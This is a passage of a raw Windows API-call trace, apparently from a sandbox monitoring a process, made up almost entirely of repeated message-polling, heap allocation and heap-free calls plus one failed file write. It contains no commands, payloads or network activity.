lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.553] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.554] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.555] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.556] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.556] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.557] GetLastError () returned 0x6 [0257.557] SetLastError (dwErrCode=0x6) [0257.557] GetLastError () returned 0x6 [0257.557] SetLastError (dwErrCode=0x6) [0257.557] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xc04290, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0) returned 0 [0257.557] GetLastError () returned 0x6 [0257.557] GetLastError () returned 0x6 [0257.557] SetLastError (dwErrCode=0x6) [0257.557] GetLastError () returned 0x6 [0257.557] SetLastError (dwErrCode=0x6) [0257.557] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdf350 | out: hHeap=0xbc0000) returned 1 [0257.557] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.557] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc052b0 | out: hHeap=0xbc0000) returned 1 [0257.557] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.557] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ac0 | out: hHeap=0xbc0000) returned 1 [0257.557] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.557] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.557] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.557] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.557] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.557] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xc2d2f8 [0257.557] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc2d2f8 | out: hHeap=0xbc0000) returned 1 [0257.557] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.557] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.558] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.558] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.558] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.558] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.558] QueryPerformanceCounter (in: lpPerformanceCount=0x7dfa28 | out: lpPerformanceCount=0x7dfa28*=18805362427) returned 1 [0257.558] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.558] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.558] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.558] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01948 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe078 [0257.558] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0257.558] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe078 | out: hHeap=0xbc0000) returned 1 [0257.558] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe078 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01948 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe190 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ac0 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.558] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcd9be0 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1b8 [0257.558] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b20 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfb0d8 [0257.559] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1e0 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01878 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b08 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe208 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01928 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d48 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.559] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d48 | out: hHeap=0xbc0000) returned 1 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d48 [0257.559] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe230 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01938 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d00 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d78 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe258 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe280 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9da8 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01958 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dc0 [0257.559] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dd8 [0257.560] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.560] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.560] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.560] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d78 | out: hHeap=0xbc0000) returned 1 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d78 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.560] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01978 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.560] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.560] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.560] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d78 | out: hHeap=0xbc0000) returned 1 [0257.560] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.560] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d5e0 [0257.560] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018d8 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d78 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.560] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.560] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9e08 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b78 [0257.560] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b78 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.560] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 